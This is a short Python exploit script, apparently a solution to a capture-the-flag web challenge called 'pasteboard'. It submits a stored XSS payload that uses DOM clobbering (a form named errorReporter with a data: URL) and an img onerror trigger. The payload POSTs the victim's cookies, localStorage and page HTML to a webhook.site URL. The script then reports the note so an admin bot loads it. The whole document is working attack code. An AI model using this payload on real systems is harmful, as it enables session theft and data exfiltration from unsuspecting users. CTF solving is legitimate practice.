import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Comprehensive exfiltration payload
exfil_code = f'''fetch('{WEBHOOK}',{{
method:'POST',
body:JSON.stringify({{
  cookie:document.cookie,
  localStorage:JSON.stringify(localStorage),
  body:document.body.innerText,
  html:document.documentElement.outerHTML.substring(0,5000)
}})
}})'''

payload = f'''<form id="errorReporter">
<input name="path" value="data:text/javascript,{exfil_code}">
</form>
<img src=x onerror="window.lastRenderError='x';throw Error()">'''

print("[*] Sending comprehensive exfiltration payload...")

session = requests.Session()
response = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "Full Exfil", "body": payload},
    allow_redirects=False
)

if response.status_code == 302:
    location = response.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    print(f"[+] Created: {note_url}")
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    if report.status_code == 202:
        print(f"[+] Bot will visit!")
        print(f"[*] Check webhook for POST request with JSON data")
        print(f"[*] https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")